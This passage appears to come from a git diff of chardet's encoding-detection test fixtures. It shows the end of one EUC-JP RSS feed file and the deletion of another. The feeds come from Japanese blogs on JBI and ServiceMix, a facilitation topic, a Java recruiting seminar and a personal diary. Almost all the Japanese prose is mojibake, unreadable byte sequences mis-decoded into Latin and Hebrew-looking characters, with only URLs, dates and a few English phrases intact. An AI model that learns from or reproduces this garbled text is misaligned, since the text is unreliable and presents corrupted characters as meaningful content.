
    ֳם¡§JDK1.4.2°¹¡£8080¥¡¼¥ָ»ָ₪¦₪־₪ַTomcat₪₪ֹ₪ֽֿמ₪ָ₪·₪ֶ₪×₪¯₪³₪ָ¡£Firefox¿ה¾©¡£IE₪ַ·׀ֿ©₪עֹ½¼¨₪·₪¿₪₪¾ל¹ח₪ֿVML₪־ְִך₪ע₪×₪³₪₪¦ֹ¬ֽ׳₪¬₪¢₪ך₪₪¹¡£Mac OS X₪ֶַ°³־₪·₪₪·₪¿¡maven servicemix, maven servicemixEx₪ַ₪₪₪±₪₪¹¡ֻ¡£

    - -
    - -

    JBI₪ָ₪ֿ
    -¡¡´»³ְטְ¸₪־»ס־ֱ₪«₪י₪־ָ´¿ט₪ֻ₪₪ך₪₪¹¡¥ְ¥¦¥ף¥ם¡¼¥ֹ¡ֻ¡£₪ט₪¦₪ֿ¡¢¥ב¥ֳ¥»¡¼¥¸¸ע´¹₪עִּ₪¸₪¿¥µ¡¼¥׃¥¹₪־¥³¥ף¥¥¸¥ֳ¥ָ₪ֻ₪ט₪כ¥¢¥׳¥ך¥±¡¼¥·¥ח¥ף¹½ֳ¼ךֻ¡₪־ֹ¸½א»ֵֽֽ₪ַ₪¹¡°ױּ£ֹװְּ¡©¡ֻ¡£

    - -

    ¡¡JBI₪־ֳִֶ§₪ֿJBI¥³¥ף¥ֶ¥₪ָ¸ֶ₪׀₪ל₪כ¥³¥ף¥ֶ¥₪עֽׁ°ױ₪·¡¢₪½₪־¾ו₪ֻ¥³¥ף¥¡¼¥ֽ¥ף¥ָ₪ע¥ַ¥׳¥ם¥₪₪·₪¿₪¦₪¨₪ַ¡¢₪½₪ל₪י₪־¥ב¥ֳ¥»¡¼¥¸¸ע´¹¼ךֻ¡₪ְ₪±₪עֹ¸½א²½₪·₪ֶ₪₪₪כ₪³₪ָ₪ַ₪¹¡£₪ַ₪¹₪«₪י¡¢¥³¥ף¥ֶ¥₪־³°ֲ¦₪ֿ₪₪ף₪ַ₪ג₪ט₪₪₪³₪ָ₪ֻ₪₪ך₪₪¹¡£₪½₪־¡¢₪₪ף₪ַ₪ג־ֹ₪₪¥׳¥ם¥ָ¥³¥כ₪עJBI¥³¥ף¥ֶ¥ֶגֹפ₪ֶֻ‏₪ל₪כ÷₪ֻ₪ֿ¡¢JBI¼ך½ח₪ֻׁ´¹₪¹₪כֹ¬ֽ׳ְ­₪¬₪¢₪ך₪₪¹¡£₪½₪־ּעּ₪עֹי₪¦¥³¥ף¥¡¼¥ֽ¥ף¥ָ₪עBinding Component¡¥׀¥₪¥ף¥ַ¥£¥ף¥°¡¦¥³¥ף¥¡¼¥ֽ¥ף¥ָ¡£־¬¾־BC¡ֻ₪ָ¾־₪·₪₪¹¡£₪½₪־ֲ¾₪־¥³¥ף¥¡¼¥ֽ¥ף¥ָ₪ֿService Engine¡¥µ¡¼¥׃¥¹¡¦¥¨¥ף¥¸¥ף¡£־¬¾־SE¡ֻ₪ָ¸ֶ₪׃₪₪¹¡£₪³₪ל₪י₪ֳִֶֿך₪־¼ֱֲץ₪¬₪¢₪כ₪ן₪±₪ַ₪ֿ₪₪¯¡¢ֳ±₪ֻּע³ה₪ָ₪·₪ֶ¹ֽ₪¨₪ֶ₪ג₪י₪¨₪׀₪₪₪₪₪ַ₪¹¡£

    - -


    -(´»³ְטְ¸₪־»ס־ֱ₪«₪יָ´¿ט¡ֻ

    - -

    ¡¡¥ב¥ֳ¥»¡¼¥¸¸ע´¹₪ֿ¥׀¥¹¡¥כ¡¼¥¿¡ֻ₪עִּ₪¸₪ֶ¹װ₪₪₪₪¹¡£₪³₪ל₪עNormalized Message Router¡¥־¡¼¥¥י¥₪¥÷¥ֹ¡¦¥ב¥ֳ¥»¡¼¥¸¡¦¥כ¡¼¥¿¡£־¬¾־NMR¡ֻ₪ָ¸ֶ₪׃₪₪¹¡£½׀ָ¯ְֵ₪ַ₪¢₪כ¥³¥ף¥·¥ו¡¼¥¡¼₪ֿ¥ב¥ֳ¥»¡¼¥¸₪ה¹װ₪­ְט¾נף₪עMessageExchange₪ָ₪₪₪¦¥ג¥־₪ֻµֽ₪ב¹‏₪NMR₪ֵֻך₪²¹‏₪₪₪¹¡Send¡ֻ¡£°ל‎¡¢¥µ¡¼¥׃¥¹₪עִף¶¡₪¹₪כ¥׳¥ם¥׀¥₪¥ְ₪ֿ¡¢NMR₪ֲֻ׀₪·₪ֶAccept₪ע¹װ₪¦₪³₪ָ₪ַ¼«¬°¸₪־MessageExchange₪ע¼טְֶ₪·₪ֶ½טֽ‎₪ע¹װ₪¦₪ן₪±₪ַ₪¹¡£₪³₪־₪ט₪¦₪ֻ₪·₪ֶ¥µ¡¼¥׃¥¹₪־ֽרֽׁ¼װ₪ִָף¶¡¼װ₪¬¡¢¥ב¥ֳ¥»¡¼¥¸¸ע´¹₪ֻ₪ט₪ֳ₪ֱֲֶ·כ¹ח₪־´״·¸₪ֻ₪¢₪כ₪ן₪±₪ַ₪¹¡£₪³₪³₪י₪״₪ף₪¬SOAֵ×₪₪ָ₪³₪ם₪ַ₪·₪ח₪¦¡£
    -¡¡₪₪ס¢¥׳¥ם¥׀¥₪¥ְ₪ֿ¡¢°לָײ÷ַ½י₪ֻ¼«¬¼«¿ָ₪עNMR₪ֵֻ׀ֿ¿₪·₪₪¹¡£₪½₪ל₪ע¥¢¥¯¥ֶ¥£¥¡¼¥·¥ח¥ף₪ָ¸ֶ₪׃₪₪¹¡£

    - -


    -(´»³ְטְ¸₪־»ס־ֱ₪«₪יָ´¿ט¡ֻ

    - -

    ¡¡ְ°ֽ‎₪¹₪כ₪ָ¡¢JBI¥³¥ף¥ֶ¥ֶג₪ֻ₪ֿ"³°ֹפ₪ָ₪ה₪ך¼ט₪ך₪¹₪כBC"₪ָ"¥ם¥¸¥ֳ¥¯₪עֳ´ֵצ₪¹₪כSE"₪¬¥ַ¥׳¥ם¥₪₪µ₪ל₪ֶ₪₪₪₪¹¡£₪½₪₪₪ִ₪י₪ֿ¥ב¥ֳ¥»¡¼¥¸¡MessageExchange¡ֻ₪ע¸ע´¹₪¹₪כ₪³₪ָ₪ַ¶¨ִ´₪·₪ֶֶ°÷מ₪·₪₪¹¡£¥µ¡¼¥׃¥¹ֽרֽׁ¼װ¡¥³¥ף¥·¥ו¡¼¥¡ֻ₪¬¥ב¥ֳ¥»¡¼¥¸₪עNMR₪ֱֻק₪כ₪ָ¡¢¥µ¡¼¥׃¥¹ֽרֽׁ¼װ¡¥׳¥ם¥׀¥₪¥ְ¡ֻ₪¬¥ב¥ֳ¥»¡¼¥¸₪ע¼ץ₪±¼ט₪ך½טֽ‎₪ע¹װ₪¦₪ן₪±₪ַ₪¹¡£

    - -

    ¡¡₪₪¿¡¢¥ב¥ֳ¥»¡¼¥¸¸ע´¹₪ֻ₪ֿ¼ן־א₪¬₪¢₪ך₪₪¹¡£´ֳ±₪ֻ₪₪₪¨₪׀ֶ±´₪ָָףֶ±´₪ַ₪¹¡£ֶ±´₪ֿײ»צ₪עֲװ₪ִ₪₪ַ½טֽ‎₪ע»₪ב₪כ₪ג₪־¡£ָףֶ±´₪ֿײ»צ₪עֲװ₪ֱ₪₪»₪ף¡£־ד₪¨₪׀HTTP₪ֶֿ±´¥ב¥ֳ¥»¡¼¥¸₪־ֲוֹ½³₪ַ₪¹¡£¥µ¡¼¥׀₪¬½טֽ‎₪·₪ֶ₪₪₪כ´ײ¡¢¥ײ¥י¥¦¥¶₪ֿ₪¸₪ֳ₪ֲָװ₪ֳ₪ֶ₪₪₪₪¹¡£

    - -

    ¡¡´נֵֻ×₪ֻJBI₪ַ½ֵֽ׳₪₪־₪ֿ₪³₪ל₪ְ₪±₪ַ₪¹¡£₪¢₪ָ₪ֿService₪ָEndPoint₪ָ₪«ServiceUnit₪ָ¥ַ¥׳¥ם¥₪₪ָ₪«¡¢₪₪₪ם₪₪₪ם₪¢₪ך₪₪¹₪¬¡¢₪½₪ף₪₪ֲֻחְ₪ַ₪ֿ₪¢₪ך₪₪»₪ף¡£

    - -


    -ServiceMix₪ָ₪ֿ
    -¡¡₪³₪³₪₪ַ½ס₪₪₪ֶ¡¢₪¹₪ַ₪ָֻט₪ל₪₪·₪¿¡£ק¡£ServiceMix₪ֿ¡¢JBI₪־₪₪₪₪₪ָ₪³¼ט₪ך₪ע₪·₪ֶ¡¢₪ב₪ף₪ֹ₪¦₪₪ָ₪³₪ם₪ע¾₪₪₪ֶ₪·₪₪ֳ₪¿₪ג₪־₪ַ₪¹¡£₪ַ₪¹₪«₪יJBI"½אµע"₪ַ₪¹¡£´»³ְטְ¸₪ֻ¸ְ₪₪‎₪ע¼₪ך₪ל₪׀¡¢JBI₪ָServiceMix₪־´״·¸₪ֿEJB2₪ָEJB3₪₪¿₪₪₪₪ג₪־₪ַ₪¹¡£ָא₪י₪ֿ¡¢"bending the JBI specification some, but keeping to the APIs¡API₪ֿ¼י₪כ₪±₪ֹ»ֵֽֽ₪ֿ₪ֱ₪ח₪₪¶₪²₪כ¡ֻ"₪ְָּµ­₪·₪ֶ₪₪₪₪¹¡http://servicemix.org/Does+JBI+depend+on+XML+and+WSDL¡ֻ¡£
    -¡ְµ³־₪ֻ¸ְ₪¨₪׀¡¢EJB3₪ֿEJB2₪ע¥י¥ֳ¥׳₪·₪¿₪ְ₪±₪ַֻ¼ֱֵ×₪ֻ₪ֿׁ₪ן₪י₪₪₪₪ן₪±₪ַ₪¹₪¬¡¢ServiceMix₪ֿ¡¢₪½₪¦₪₪₪¦₪·₪¬₪י₪₪ג₪₪¯¡¢ֹ¬ֽ׳₪־₪₪₪₪ג₪־₪ֵֻֿצ₪ֻ₪׀₪ֳ₪µ₪ך₪ָּµ»כ₪·₪ֶ₪₪₪₪¹¡ֻ¡£

    - -

    ¡¡₪ַ₪¹₪«₪י¡¢ServiceMix₪ע₪ה₪ֳ₪ֶ₪גJBI₪ע´°ֱ´₪ֻֽ‎²ע₪·₪¿₪ָ₪ֿ₪₪₪¨₪₪₪₪־₪ַ₪¹₪¬¡¢JBI₪־ֻ¼ֱ₪ֽֿ‎²ע₪¹₪כ₪³₪ָ₪¬₪ַ₪­₪₪¹¡£₪·₪«₪ג¡¢JBI₪ט₪ך₪גֽ₪«₪ִֻ¾´¶ֵ×₪ֻֽ‎²ע₪¹₪כ₪³₪ָ₪¬₪ַ₪­₪כ₪־₪ַ₪¹¡£

    - -

    ¡¡ServiceMix₪ֿ¥³¥ף¥¥¸¥ֳ¥ָ¡¦¥¢¥׳¥ך¥±¡¼¥·¥ח¥ף₪־¹½ֳ¼ךֻ¡₪ַ₪¹¡£SOA₪ָ₪₪₪¦Buzz¥ן¡¼¥ֹ₪ָ₪·₪ֶֽ‎²ע₪¹₪כֹ¬ֽ׳₪ֿ₪¢₪ך₪₪»₪ף¡£ֻֽ₪¬ַ®₪¯₪₪ֳ₪ֶ½ס₪₪₪ֶ₪·₪₪₪₪₪·₪¿₪¬¥³¥ף¥ֶ¥¥¡¼¥¹¡¦¥µ¡¼¥׃¥¹¡¦¥₪¥ף¥ֶ¥°¥ל¡¼¥·¥ח¥ף₪ָ₪₪₪¦₪ג₪־₪ַ₪¹¡₪¿₪ײ₪ף¡ֻ¡£

    - -

    ¡¡´»³ְטְ¸₪גJBI₪־»ֵֽֽ½ס₪עֶֹ₪ף₪ַ₪₪₪כ₪ְ₪±₪ַ₪ֿ¬₪«₪י₪₪«₪ֳ₪¿₪³₪ָ₪¬¡¢ServiceMix₪עִּ₪¸₪כ₪³₪ָ₪ַֽ‎²ע₪¹₪כ₪³₪ָ₪¬₪ַ₪­₪¿₪ָ¸ְ₪ן₪ל₪ֶ₪₪₪₪¹¡£₪³₪־´¶³׀₪עֳ־₪כ₪¿₪ב₪ֻ₪ג¡¢₪¼₪ׂ¥³¡¼¥ֹ₪ע¸«₪ֶ¡¢´¶₪¸₪ֶ₪₪ֶ₪¯₪ְ₪µ₪₪¡£₪½₪ל₪¾₪ל₪־´¶₪¸‎₪ְ₪ָ₪ֿ»׳₪₪₪₪¹₪¬¡¢SOA₪ָ₪₪₪¦¥¢¥₪¥ַ¥¢₪¬ָף¾ן₪ֻ¿ָ¶ב₪ַ₪¢₪כ₪³₪ָ₪ֻµ₪₪ֵ₪₪₪ֶ₪₪₪¿₪ְ₪±₪ל₪׀₪ָ»׳₪₪₪₪¹¡£

    - -

    ¡¡₪µ₪ֶ¡¢¼¡²ף₪ֿ¥ַ¥ג¥¢¥׳¥ך₪־³µֽ׳₪ָservicemix.xml₪־ְגְּ₪ע½ס₪₪₪ֶ₪₪¿₪₪₪ָ»׳₪₪₪₪¹¡£

    - -

    ServiceMix₪־°לֽק

    ]]>
    -servicemix -yusuke -2005-12-09T23:59:00+09:00 -
    - -¹¥₪­₪ְ₪«₪י -http://www.arclamp.jp/blog/archives/000736.html -¡¡÷£ֶ₪ֽֿ§¿ֽ₪־¾ׂ²נ₪ַ¥ױ¥¡¥·¥ך¥ֶ¡¼¥¿¡¼₪־µ´¡₪ָ₪₪₪¦₪«ְח¿ֽ¡©¡ֲִֵֻ¼ֽ־°ל₪µ₪ף₪ָֻ÷ַ¯²ס¡£

    - -

    ¡¡₪½₪־ֳז₪ַ¿´₪ֻ»ִ₪ֳ₪¿¸ְֽױ₪¬¡ײ¹¥₪­₪ְ₪«₪י¡׳₪ָ₪₪₪¦ֳֿ₪ַ₪¹¡£
    -¡¡־ד₪¨₪׀¹ֽ¸ֵ³״¼װ₪¬₪₪¼־ע»ֻ₪עִ´₪₪כ₪־₪«₪ָ₪₪₪¨₪׀¡¢¡ײּ₪ֽטֳ־₪כ₪¿₪ב¡׳¡ײ²בµמ₪«₪י³״₪ײ₪¿₪ב¡׳₪₪₪ם₪₪₪םֽ‎ֽ³₪עֵת₪¨₪כ₪±₪ֹ¡¢¹₪«₪ל₪¿₪«₪יֵת₪¨₪¿₪ְ₪±¡£₪­₪ֳ₪ָ₪½₪ל₪ֿ¡¢¹¥₪­₪ְ₪«₪י¡£

    - -

    ¡¡¡ײ¹¥₪­₪ְ₪«₪י¡׳₪ָ₪ֿ£²₪ִ₪־₪³₪ָ₪·₪«µב₪ב₪₪₪¡£₪½₪ל₪ְֿ¸₪­₪כ₪³₪ָ₪ָ»א₪ּ₪³₪ָ¡£₪½₪־ֱ´₪ֶ₪¬¹¥₪­₪ַ₪¢₪כ₪³₪ָ¡£₪₪ֻ₪גֽ‎ֽ³₪₪ף₪«₪₪₪י₪₪₪¡£
    -¡¡ֽ‎ֽ³₪¬₪¢₪כ₪ֳ₪ֶ₪³₪ָ₪ֿ¡¢₪¦₪½¡£¹¥₪­₪ֳ₪ֶ₪³₪ָ₪ֻ¥ם¥¸¥«¥כ₪ֽ‎ֽ³₪₪ף₪ֶ₪₪₪¡£
    -¡¡₪¹₪₪ֶ₪עֶֽ₪­ָ´₪±₪ֶ¡¢₪½₪ל₪³₪½ְ¸»א₪ֻ´״·¸₪₪¯¹¥₪­₪ְ₪ָ¸ְ₪¨₪כ₪³₪ָ¡£₪½₪ל₪ֿ¡ײ¹¥₪­₪ְ₪«₪י¡׳₪ָ₪₪₪¦°¾ו₪־₪³₪ָ₪ֿ₪₪₪₪־₪ַ₪¹¡£

    - -

    ¡¡ֻֽ₪¬¡ײ¹¥₪­₪ְ₪«₪י¡׳₪ָ₪₪₪¦¸ְֽױ₪ֻ₪ַ₪¢₪ֳ₪¿₪־₪ֿ½¢¿¦³טֶ°₪־»‏¡£¼ִׂ¹ְּּ₪ַ¡ײ₪₪ף₪ֶַ‏₪ך₪¿₪₪₪־¡©¡׳₪ָ¹₪«₪ל¡¢₪¦₪ְ₪¦₪ְ₪ָֽ‎ֽ³₪ע½ׂ₪₪ֶ₪₪כ¡£₪½₪ל₪¬¡¢₪¢₪₪ך₪ֻ₪ְ₪ב₪ְ₪ב₪ְ₪ֳ₪¿₪־₪ַ₪·₪ח₪¦¡¢¿ֽ»צ₪־¿ֽ₪¬½ץ₪±½®₪ע½׀₪·₪ֶ₪¯₪ל₪₪·₪¿¡£

    - -

    ¡ײ₪ט₪¦₪ֿ¹¥₪­₪ְ₪ֳ₪ֶ₪³₪ָ₪ְ₪ט₪ֽ¡׳

    - -

    ¡¡₪½₪־»‏»ֿ₪ב₪ֶµ₪₪ֵ₪₪₪¿₪ף₪ַ₪¹¡£¡ײ¹¥₪­₪ְ₪«₪י¡׳₪ֳ₪ֶ₪₪₪¦ֽ‎ֽ³₪¬₪¢₪ך₪₪ף₪ְ₪ֳ₪ֶ¡£₪½₪¦¡ײ¹¥₪­₪ְ¡׳₪ֳ₪ֶ₪³₪ָ₪ֻ₪½₪ל°¾ו₪־¸ְֽױ₪₪ף₪ֶ₪₪₪י₪₪₪₪ֳ₪ֶ¡£

    - -

    ¡¡¡ײ¹¥₪­₪ְ₪«₪י¡׳¡£₪³₪־¸ְֽױ₪ע₪₪₪¨₪כ¿ֽ₪ֿ₪¹₪´₪¯¶¯₪₪¡£₪­₪ֳ₪ָ¡¢¼«¬₪־´¶³׀₪ע¿®₪¸₪כ₪ֳ₪ֶ₪³₪ָ₪ְ₪«₪י¡£ִ¾´¶₪₪ֹ½ֵֽ׳₪₪ג₪־₪ֿ₪₪₪₪־₪ַ₪¹¡£

    - -

    ¡¡¶ץµ₪₪־₪ט₪¦₪ֻ¡¢₪½₪ל₪¬₪₪«₪ֳ₪¿₪י»א₪ף₪ְ₪גֶ±ֱ³₪ָ»׳₪¨₪כ₪³₪ָ¡£₪ַ₪ג¡¢₪¹₪´₪¯¼«ֱ³₪ֻ₪½₪³₪ֲֻ¸÷₪¹₪כ₪ג₪־¡£₪ֳ₪ֶ₪₪₪¦₪«¡¢₪₪¯₪₪כ₪₪ף₪ֶ₪³₪ָ₪¬ֱֱ₪¹₪י½׀ֽט₪₪₪¡£₪½₪ל₪¬¡ײ¹¥₪­¡׳¡£¡₪ְ₪«₪י¡¢¼÷₪ֳ₪ֶ½י₪ב₪ֶµ₪₪ֵ₪¯₪ף₪ְ₪ָ»׳₪¦₪ט¡ֻ

    - -

    ¡¡¡ײ¹¥₪­₪ְ₪«₪י¡׳¡£₪¡¢ֲח₪₪ך¾®₪₪ך₪ֿ₪¢₪ֳ₪ֶ₪ג¡¢₪³₪־¸ְֽױ₪ע¡¢₪₪ֳ₪¹₪°₪ֻ₪₪₪¨₪כ₪ט₪¦₪ְֻ¸₪­₪ֶ₪₪₪¿₪₪₪ָ»׳₪₪₪₪·₪¿¡£

    - -


    -¡¡₪ֳ₪ֶ¡¢¥ױ¥¡¥·¥ך¥ֶ¡¼¥¿¡¼´״·¸₪₪₪₪¸₪ד₪ף¡w¡£₪₪¿¡¢₪₪₪ֳ₪ׁ₪₪₪×ֳֿ₪·₪µ₪»₪ֶ₪¯₪ְ₪µ₪₪₪₪»¡£

    ]]>
    -¥י¥₪¥ױ -yusuke -2005-12-09T00:17:56+09:00 -
    - -´»³ְטְ¸¥ל¥¯¥ֱ¥ד¡¼¥·¥ך¡¼¥÷ֲט2²ףּ₪ֵֻ׀ֳֵ -http://www.arclamp.jp/blog/archives/000734.html -¡¡÷£½µ¶גֶֻֽ¡12/9¡ֻ₪־´»³ְטְ¸¥ל¥¯¥ֱ¥ד¡¼¥·¥ך¡¼¥÷ֲט£²²ף₪ֵַ׀ֳֵ₪¹₪כ₪³₪ָ₪ֻ₪₪ך₪₪·₪¿¡£13:40¡ֱ15:00₪־´»³ְטְ¸₪¬¹ײ±י₪¹₪כ»‏´ײֶג₪ַServiceMix₪־¥ַ¥ג¡ץ¥·¥ח¡¼¥ָ¥׳¥ל¥¼¥ף₪עֳ´ֵצ₪µ₪»₪ֶ₪₪₪¿₪ְ₪­₪₪¹¡£

    - -

    ¡¡¥ַ¥ג₪ֿJavaOne₪ַ₪ה₪ֳ₪ֶ₪ג₪־₪ע¥·¥ף¥׳¥כ₪ֻ₪·₪¿₪ג₪־₪ֻ₪₪ך₪₪¹¡£₪ַ₪גServiseMix₪־2.0.2ֲ׀±‏₪¹₪כ₪ְ₪±₪ַ°ֽֽ₪ֻ»‏´ײ₪¬₪«₪«₪ֳ₪ֶ₪·₪₪₪₪₪·₪¿¡£₪₪ֻ₪ה₪יXML¥ׁ¡¼¥µ¡¼₪¬ׁ₪ֶ°₪­₪ע₪¹₪כ₪ף₪ַ₪¹₪ט₪ֽ₪§¡£₪₪ף₪₪־₪ַ₪·₪ח₪¦₪«¡£
    -¡¡₪ִ₪₪₪ַ₪ֻJavaOne₪ַµ₪₪ֻ₪₪ֳ₪ֶ₪₪₪¿ְֵ₪ע½₪ְµ₪·₪ֶ₪₪₪·₪¿¡£₪₪ף₪ָ¡¢₪ט₪»₪׀₪₪₪₪₪־₪ֻ¡£₪³₪¦₪₪₪¦₪³₪ָ₪ע¥׳¥ם¥¸¥§¥¯¥ָ₪ַ₪ג₪ה₪ֳ₪ֶ¡¢₪ֿ₪₪כ¥¿¥₪¥׳₪ַ₪¹¡£₪¨₪¨¡¢₪½₪¦₪ַ₪¹₪ָ₪ג¡£

    - -

    ¡¡₪ֳ₪ֶ₪₪₪¦₪«₪ַ₪¹₪ט¡¢¹ײ±י₪₪ַ£±½µ´ײ₪עְ₪ֳ₪ֶ₪«₪י₪«₪י°ֽֽך₪¹₪כְטְ¸₪גְטְ¸₪ַ₪¹¡£₪½₪־₪ָ₪­₪־¸ְֽױ₪¬¡¢

    - -
    ־כּ₪µ₪ף¡¢₪×´ך₪₪₪¬₪¢₪ך₪₪¹¡£ - -

    ¥י¥ף¥׳₪ע₪₪ַ₪ֶ₪₪₪₪¹¡£jini₪¬¸½₪ל₪₪¹₪ט₪¦₪ֻ¡£

    - -

    ₪ַ₪·₪¿¡w¡£ְטְ¸₪־¥ב¡¼¥כ₪ֵֻֿצ₪ַֻּּע₪₪₪ַ₪¹¡£₪ג₪ֱ₪ם₪ף²קֲת₪µ₪»₪ֶ₪₪₪¿₪ְ₪­₪₪·₪¿¡£

    - -

    ¡¡₪³₪ֱ₪י₪ָ₪·₪ֶ₪ֿJavaOne₪ֵַ¸¼¨²ס¾ל₪־NECµ·ֶ¾ל½ך₪ֻ₪₪₪¿ְטְ¸₪עב₪₪¨₪ֶ¥׳¥ל¥¼¥ף₪·¡¢¥ל¥¯¥ֱ¥ד¡¼¥·¥ך¡¼¥÷₪ֻ¹װ₪¯₪ָ₪₪₪¦¥¢¥װ¡¼¥כ₪ג₪·¡¢ֱִךֶג₪־½׀ֽט»צ₪ַ₪ֿ₪¢₪ך₪₪¹₪¬¡¢₪₪₪«₪ף₪»₪ףµ₪ַ₪¹¡£₪¿₪ְִֹ₪₪₪ִ₪ב₪י₪ל₪₪₪₪ָֻµ₪₪ע₪ְ₪»₪₪₪¥¿¥₪¥׳₪₪־₪ַ₪ֱ₪ח₪¦₪ֹ₪₪₪₪₪־₪«₪ג₪·₪ל₪₪»₪ף¡£

    - -

    ¡¡₪½₪ף₪₪ן₪±₪ַ³ֶ‎ּּ₪ֻ¼ד´³₪־ֲ₪ך₪¬₪¢₪ך₪₪¹₪¬¡¢₪₪ף₪ָ₪«₪·₪₪¹₪־₪ַ¡¢₪×µצ₪·₪ע¡£
    -¡¡

    - -

    ¡¡»ִַ°₪₪¬₪י¡¢¥ל¥¯¥ֱ¥ד¡¼¥·¥ך¡¼¥÷₪־»²²ֳ₪ִֿש₪בְ₪י₪ל₪ֶ₪·₪₪ֳ₪ֶ₪₪₪₪¹₪¬¡¢ֵצֶ»²²ֳ₪µ₪ל₪כ‎₪ֿ₪×ְ¼₪«₪±₪¯₪ְ₪µ₪₪₪₪»¡£ֵצֶ₪־¿´ַ₪ְֿטְ¸₪־»ס־ֱ₪¬100ֻח₪עִ¶₪¨₪כֳז₪ַ¡¢ֻֽ₪־ֳֿ₪¹»‏´ײ₪¬₪ֹ₪ל₪¯₪י₪₪₪ָ₪ל₪כ₪«₪ָ₪₪₪¦₪³₪ָ₪ַ₪¹¡£

    - -


    -2005ַ¯12·מ9ֶ¡¶ג¡ֻ 13:30¡ֱ18:00¡¼ץֹױ13:00¡ֱ13:30¡ֻ
    -ֶ־©¥½¥ױ¥ָ¥¦¥§¥¢¥¨¥ף¥¸¥ֻ¥¢¥ך¥ף¥°³פ¼°²ס¼ׂ¡¡4F¹ײֶ²

    ]]>
    -Java -yusuke -2005-12-07T01:52:31+09:00 -
    - - - \ No newline at end of file diff --git a/chardet/tests/EUC-JP/aristrist.s57.xrea.com.xml b/chardet/tests/EUC-JP/aristrist.s57.xrea.com.xml deleted file mode 100644 index a793535..0000000 --- a/chardet/tests/EUC-JP/aristrist.s57.xrea.com.xml +++ /dev/null @@ -1,577 +0,0 @@ - - - - -aristrist2k+5 -http://aristrist.s57.xrea.com/mt/ - -ja - -2006-01-02T19:27:50+09:00 - - - - - - - - - - - - - - - - - - - - - - -[°לְֵֶַֻֽ] -http://aristrist.s57.xrea.com/mt/archives/000935.html - ÷£ֶ₪־½׀ֽט»צ ֳכֱ°₪ֻµ¯₪­₪כ ₪×¾׀₪₪₪־¥׃¥ַ¥×₪ע´ׁ₪כ ₪×¾׀₪₪₪־ָײֱָ₪ע´ׁ₪כ ₪י₪₪₪ֱ¥®¥¿¡¼₪עֳֶ₪¯ ּ₪ִ´ְ°₪ְ₪ָ₪¢₪₪ך₪ֻ¸¹¹ג₪¬¹ג₪₪₪־₪ַ¶ב½ך₪־100±¥·¥ח¥ֳ¥׳₪ַֽ½₪בַד₪ֳ₪ֶ₪×₪₪₪¿¥µ¥ף¥ֹ¥¡¼¥ׁ¡¼₪ַ¥ײ¥ך¥ֳ¥¸₪־ֲֵז₪ע÷ן₪כ ¥ײ¥ך¥ֳ¥¸₪־ֲֵז¡ִ ¥®¥¿¡¼²¿ַ¯ֳֶ₪₪₪ֶ₪ף₪ְ²¶ ּ¾ֱ°₪¬₪ן₪«₪י₪ף(¡°¦״¡°¡¡) ½׀³₪±₪ֶ₪₪₪¿¥×¥ױ¥¯¥ם₪¬µ¢₪ֳ₪ֶ₪­₪ֶ¶ב½ך₪־²¹ְפ₪ֻ¹װ₪³₪¦₪ָ¸ְ₪¦₪־₪ַֹױ₪­¹ח₪¦ µ׳¡¹₪־ֲחֽב¾ל ¥µ¥¦¥₪ֻ₪גֶ‏₪ֳ₪ֶ₪₪¿ »׳₪ן₪÷ ¡״₪¦₪ֳ¡ ₪ָ₪«ְ¼₪ַ₪¿w ָױָ׃¿©₪ֳ₪ֶ÷ֶ₪׃¥®¥¿¡¼₪ֻ¼ט₪ךֱָ₪א ₪₪₪₪ּ¾ֱ°₪ע»׳₪₪ֹױ₪₪₪¿₪־₪ַּ¿ּ¾ ¡״ֽט²»(₪י₪₪₪×₪ף)´¡ ₪ף¡ֱ¡¡₪₪₪₪ּ¾ֱ°₪ְw ¥®¥¿¡¼ִ´ְ°ֲט°לֳ³¬½×־» ₪ְ₪ף₪ְ₪ף°¦ֳו₪¬ֽ¯₪₪₪ֶ₪­₪₪·₪¿ ₪₪ְ₪₪ְ¸¹¹ג²¼₪²₪¿₪₪₪ַ₪¹ ₪ֶ₪«²¼₪²₪₪­₪ד¥¦¥₪¯ֳֶ₪±₪₪ֶ₪ף(¡­¡¦¦״¡¦) ¢£ ֽב¾ל₪ֻ₪ֶ ָ±₪עְצ₪¦²¶₪־₪¦₪·₪ם₪ֳַֻ₪¿₪ֱ₪¬־©₪ֱֳֿ ¡״ֳז³״ְ¸₪₪¿₪₪₪ה₪¡(¾׀) ¡״₪½₪ל₪ֳֿ»₪¹₪®₪כ₪ה₪ם¡(¾׀) ָ±₪־ּ׃₪־ֳֿ₪·₪ֽ (¡­¡¦¦״¡¦)₪₪ֳ ¢¨ ¡״ֳ־₪י₪ּ₪₪ָֻ¯ַה₪µ₪ל₪ֶ₪¿ֲט»ֽ½½´¬¡(´ע)... - - -

    ÷£ֶ₪־½׀ֽט»צ

    - -

    ֳכֱ°₪ֻµ¯₪­₪כ
    -₪×¾׀₪₪₪־¥׃¥ַ¥×₪ע´ׁ₪כ
    -₪×¾׀₪₪₪־ָײֱָ₪ע´ׁ₪כ

    - -

    ₪י₪₪₪ֱ¥®¥¿¡¼₪עֳֶ₪¯
    -ּ₪ִ´ְ°₪ְ₪ָ₪¢₪₪ך₪ֻ¸¹¹ג₪¬¹ג₪₪₪־₪ַ¶ב½ך₪־100±¥·¥ח¥ֳ¥׳₪ַֽ½₪בַד₪ֳ₪ֶ₪×₪₪₪¿¥µ¥ף¥ֹ¥¡¼¥ׁ¡¼₪ַ¥ײ¥ך¥ֳ¥¸₪־ֲֵז₪ע÷ן₪כ

    - -

    ¥ײ¥ך¥ֳ¥¸₪־ֲֵז¡ִ
    -¥®¥¿¡¼²¿ַ¯ֳֶ₪₪₪ֶ₪ף₪ְ²¶
    -ּ¾ֱ°₪¬₪ן₪«₪י₪ף(¡°¦״¡°¡¡)

    - -

    ½׀³₪±₪ֶ₪₪₪¿¥×¥ױ¥¯¥ם₪¬µ¢₪ֳ₪ֶ₪­₪ֶ¶ב½ך₪־²¹ְפ₪ֻ¹װ₪³₪¦₪ָ¸ְ₪¦₪־₪ַֹױ₪­¹ח₪¦

    - -

    µ׳¡¹₪־ֲחֽב¾ל
    -¥µ¥¦¥₪ֻ₪גֶ‏₪ֳ₪ֶ₪₪¿
    -»׳₪ן₪÷ ¡״₪¦₪ֳ¡ ₪ָ₪«ְ¼₪ַ₪¿w

    - -

    ָױָ׃¿©₪ֳ₪ֶ÷ֶ₪׃¥®¥¿¡¼₪ֻ¼ט₪ךֱָ₪א
    -₪₪₪₪ּ¾ֱ°₪ע»׳₪₪ֹױ₪₪₪¿₪־₪ַּ¿ּ¾

    - -

    ¡״ֽט²»(₪י₪₪₪×₪ף)´¡
